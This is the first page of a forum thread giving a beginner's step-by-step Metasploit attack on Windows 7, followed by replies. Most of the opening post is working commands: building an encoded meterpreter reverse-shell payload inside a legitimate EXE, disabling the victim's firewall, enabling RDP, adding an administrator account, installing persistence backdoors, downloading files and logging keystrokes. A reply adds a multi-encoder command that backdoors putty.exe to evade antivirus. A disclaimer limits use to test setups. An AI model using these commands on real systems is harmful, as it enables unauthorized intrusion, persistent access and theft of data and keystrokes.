Page 1 of 2 12 LastLast
Results 1 to 10 of 37

Thread: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Post [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Pentest on BT4 R1

    GUIDE EXPLANATION:
    Text in {} = Titles
    # In front of text = Info
    Text in [] = Your Input

    # Here are some examples on [] from the guide beneath:

    # set LHOST [IP ADRESS INT.] = set LHOST 192.168.1.15

    # rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

    # search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

    # So when you input anything where there is [], remember to remove the []

    -------------------------------------

    {Shell 1} (Creating Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    # To update framework3
    
    clear
    
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    # If you get encoder error find another EXE or try to encode it less time

    # Copy payload to target


    -------------------------------------

    {Shell 2} (Using Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT] (if used in msfpayload in Shell 1)
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, so start the payload on victim computer
    ----------

    Code:
    use priv
    
    ps
    # Look for PID on explorer.exe
    
    migrate [PID on explorer]
    
    getsystem
    
    sysinfo
    # If "Arch = x64" = NO HASHDUMP it won't work
    # Now we are in the system

    -------------------------------------

    {Prepare for RDP}

    Code:
    shell
    # Connect to CMD
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    # Allows incoming terminal service connections
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    # Disables blocking incoming Terminal service connections
    
    Netsh firewall set opmode enable
    # Enable Firewall on Victim
    
    Netsh firewall set opmode disable
    # Disable Firewall on Victim
    {USER:} (Still in shell)

    Code:
    net user [USERNAME] [PASSWORD] 
    # Change password for the user
    
    # Or create you own user
    
    net user [USERNAME] [PASSWORD] /add
    
    net localgroup [GROUP] [USERNAME] /add 
    # In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
    
    net accounts /maxpwage:[days] | unlimited
    # Examples: net accounts /maxpwage:6
    # or: net accounts /maxpwage:unlimited
    # CTRL + Z then Y to exit shell without it freezing the system

    -------------------------------------

    {Shell 3} (RDP to compromised system)

    # No need for ":" and [PORT] if local

    # Remember to be in "root@bt:~#"
    Code:
    rdesktop [IP]:[port] -u "[USERNAME]"
    -------------------------------------

    {Setting up backdoors for future use} (when in meterpreter console)

    Code:
    run metsvc (set backdoor for next time you want in)
    
    (OR THIS)
    
    run persistence -r [YOUR IP ADRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
    # 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info

    ***UP- AND DOWNSIDES USING THIS***

    METSVC:
    VERY BAD: All 3 files is use gets flagged by Norton Internet Security 2011 as trojan, maybe other AV's will do this too!
    BAD: If ip change you have to know the IP to connect back to Victim
    GOOD: Easy to use
    GOOD: It dosn't request YOUR IP and port!

    PERSISTENCE:
    BAD: It requests YOUR IP and port!
    BAD: Can be more "difficult" to use
    GOOD: Flexible
    GOOD: Auto Connect
    ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) it is detected as bad, and will be removed. and that's a tool you must download!

    -------------------------------------

    {GET BACK INTO SYSTEM} (using metsvc in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/metsvc_bind_tcp
    
    set LPORT 31337 (Must be this port of what i know)
    
    set RHOST [VICTIM IP ADRESS]
    
    show options (see if your setup is correct)
    
    exploit
    ------------------------------------

    {GET BACK INTO SYSTEM} (using persistence in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT]
    # The port set in persistence backdoor
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, it will reconnect to your computer within 300 sec
    ----------

    getuid
    # If = "NT AUTHORITY\SYSTEM" do this else go to "use priv":

    ps
    # Find PID on explorer.exe

    steal_token [NUMBER - PID on explorer]
    # From what i know it grants you the same rights as the user running that process


    use priv

    get system


    ------------------------------------

    {Search} (in meterpreter console)

    Code:
    search -f *.jpg
    # Finding all JPG files on the system
    
    search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
    # Finding all JPG filen i a specific folder
    
    searct -f test.txt
    # Find a specific file on the whole system
    ------------------------------------

    {Uploading and Downloading} (How I use it)

    # Use "ls", "pwd" and "cd" to navigate around - see below under commands

    Explanation:
    Create a txt file on yout BT4 desktop and write any thing in it, or nothing, and save it with the name "test.txt" then in terminal in meterpreter console (after your connected to victim), navigate to the desktop of the user currently logged in.
    Use "pwd" without quotes, to check if the path is correct, if it is type the following:


    {Upload}

    Code:
    upload /root/test.txt test.txt
    
    # and if you are uploading a file with space in it's name:
    
    upload "/root/test 2.txt" "test 2.txt"
    # Or if your not in the path where you want to upload a file, and want it to be uploaded to another folder

    upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
    # Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"


    {Download}

    Explanation:
    Now we are going to download the file we just uploaded the "test.txt". Navigate to the folder if your not already in it, by using the "cd", "pwd" and "ls" commands.

    Then type:


    Code:
    download test.txt /root/test.txt
    
    # And if you are downloading a file with space in it's name
    
    download "test 2.txt" "/root/test 2.txt"
    
    # Or if your not in the path where you want to download a file from, but know the exact path and name by using search
    
    download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
    # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
    ------------------------------------

    {Commands} (meterpreter console)


    help
    # USE THIS!!! thats mostly how i got this knowledge and then googled the commands to get more info on them

    screenshot
    # No need to say what it does - remember you must have used "use priv" in meterpreter first

    cd [DRIVE:\\FOLDER\\FOLDER]
    # You get it - Change directory

    pwd
    # Show what directory your in

    ls
    # List Current Directory

    upload

    # See above

    download

    # See above

    search
    # See above and Meterpreter Search This can be used in diff. consoles!

    keyscan_start
    # Key Sniffer - Start

    keyscan_dump
    # Key Sniffer - dump keys while running

    keyscan_stop
    # Key Sniffer - Stop

    ------------------------------------

    Few words from me:

    First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

    And i will point out for other beginners, i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.

    As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!

    Please give some feedback
    Last edited by xibit1987; 09-16-2010 at 10:00 PM. Reason: Code wrapping, and fix typos

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    You might want to make use of code boxes and some simple formatting options to make that a bit easier to follow...
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by lupin View Post
    You might want to make use of code boxes and some simple formatting options to make that a bit easier to follow...
    Done now, saw i right away, looked better in note pad xD

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    The best part was probably the last few lines
    : i started on using metasploit 2 days ago so do your self a favour and put some heart into it, do your legwork before asking, i just gave you a complete detailed guide from start to finish, on a silver platter.
    Probably doesn't get truer than that.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #5
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by Archangel-Amael View Post
    The best part was probably the last few lines

    Probably doesn't get truer than that.
    Well most beginners ask becaus they just want the info so that they can misuse it to do harm, without a better understanding of what it is they are doing. where only a few ask becaus they really want to learn some thing from it.

    I know this guide can and will be misused by some ppl. and i'm fine with that, i just hope they get caught I don't have respect for ppl who want to break into others system without their permission, i really can't see the point in it :/

    I'm learning this so that i know a little more about how I can be attacked, and i use this info so that i maybe can close some holes in my setup at home And it's also quite fun

  6. #6
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

    Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. Any everybody likes better software.

    I appreciated the section you did on backdooring. You may want to include the backdooring an exe capability. If you're not sure how to with metasploit, check out the metasploit unleashed section on extended msf usage.
    Chapter 12 section 2. Great feature, although the MSF unleashed page only goes into the beginning detail of it, probably due to all of our favorite mantra (try harder!)

    Metasploit Unleashed - Mastering the Framework

    I've had a lot of fun messing around with backdooring a few of the most used windows exe's.

    I can see you've done your reading however. Great tut! esp after the editing you've done

  7. #7
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by iproute View Post
    I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

    Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. Any everybody likes better software.

    I appreciated the section you did on backdooring. You may want to include the backdooring an exe capability. If you're not sure how to with metasploit, check out the metasploit unleashed section on extended msf usage.
    Chapter 12 section 2. Great feature, although the MSF unleashed page only goes into the beginning detail of it, probably due to all of our favorite mantra (try harder!)

    Metasploit Unleashed - Mastering the Framework

    I've had a lot of fun messing around with backdooring a few of the most used windows exe's.

    I can see you've done your reading however. Great tut! esp after the editing you've done
    About backdooring an exe: I already have that in the "Create the exploit". The first code box in the guide. i use encode here and i also explain i LITTLE bit about the error you can get I didn't go directly into details, but if thats what you guys want i can do that too By the way, have any of you got the "-k" option to work yet, so that the exe your backdooring still work? If yes, pleas post an example code

    And again, I'm a beginner so please correct me if have understood anything wrong or I explained anything in the wrong way!

    I thank you all for the kind words
    Last edited by xibit1987; 09-24-2010 at 01:22 AM.

  8. #8
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    hi,im sorry for my amature question.im new one to metasploit

    i dont get it this section
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    what EXE i need it ?

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by xibit1987 View Post
    About backdooring an exe: I already have that in the "Create the exploit". The first code box in the guide. i use encode here and i also explain i LITTLE bit about the error you can get I didn't go directly into details, but if thats what you guys want i can do that too By the way, have any of you got the "-k" option to work yet, so that the exe your backdooring still work? If yes, pleas post an example code

    And again, I'm a beginner so please correct me if have understood anything wrong or I explained anything in the wrong way!

    I thank you all for the kind words

    Actually the -k option is what I am specifically referring to with my backdooring comment. As this is a client side attack, tricking/social engineering the user is everything so keeping your the backdoored exe working can be key sometimes. Not all executables work as templates with the -k option or possibly even as templates in the first place.

    Also bear in mind that this example code here did not pass my current avast. I am moving this week and don't have time to re-work the encoding so it does. It did formerly, however the executable made with this multi-encoding command string has been uploaded to virustotal for testing, as really the command was simple for testing the workings of running multiple encoders. I also developed this particular string some time ago.

    The code in this case is simply an example that yes multiple encoders can still be used when backdooring an exe and even still keeping template exe working.

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26
     LPORT=1417 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e
     x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw |
     msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16
     -t exe -x /root/putty.exe -k -o /root/putty-backdoored.exe
    Again, when running it with this post Avast did detect the exe and disposed of it. With avast off I am able to get a meterpreter session started. Of course modify ip address and port as needed.

  10. #10
    Junior Member
    Join Date
    Aug 2010
    Posts
    48

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Yes indeed a great tut, I have yet to try it. Like like all tuts I have been through there are always issues to get around, and that is the fun of it. No attack is completley linear to the others, and in turn forces you to learn outside the given realm.

    I am not a security professional, more-so an enthusiast. It is tuts like these that not only educate people like me, but allow me to apply said education and offer the information to others who do not have the time or knowledge.

    I have had numerous friends have their Data-Limits completley thrashed by intruders, which casues them to spend more money. I have had mine and other friends banking information sniffed out (By neighbours who had a little run in with the law post hack) and in turn have used what little information I have to ameturley secure their networks and routers.

    And to think 2 months ago I was completley ignorant to BackTrack, and now after two months of passive learning, I can say that I have the basic knowledge and ability to secure minor residential networks for friends and family, and I have these forums to thank, and the posters I am indebted to. No one will be stealing my Gigabytes and money anymore!

    Thanks for the tuts, the help, the information and overall professional attitude reflected by a majority of users on this site. Thanks again.

Page 1 of 2 12 LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. [Video] Man In The Middle (MITM) Attack (ettercap, metasploit, sbd)
    By imported_g0tmi1k in forum OLD BT4 Videos
    Replies: 6
    Last Post: 01-16-2010, 08:47 PM
  3. Replies: 2
    Last Post: 07-08-2009, 08:56 AM
  4. how to configure Metasploit Client-Side Attack
    By black02 in forum OLD Newbie Area
    Replies: 2
    Last Post: 04-09-2009, 08:03 PM
  5. Some detailed questions about WEP cracking
    By jemenake in forum OLD Wireless
    Replies: 16
    Last Post: 05-01-2007, 09:24 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •